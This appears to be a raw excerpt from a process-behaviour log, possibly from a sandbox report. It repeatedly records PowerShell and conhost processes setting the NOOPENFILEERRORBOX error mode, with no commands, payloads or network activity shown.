Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
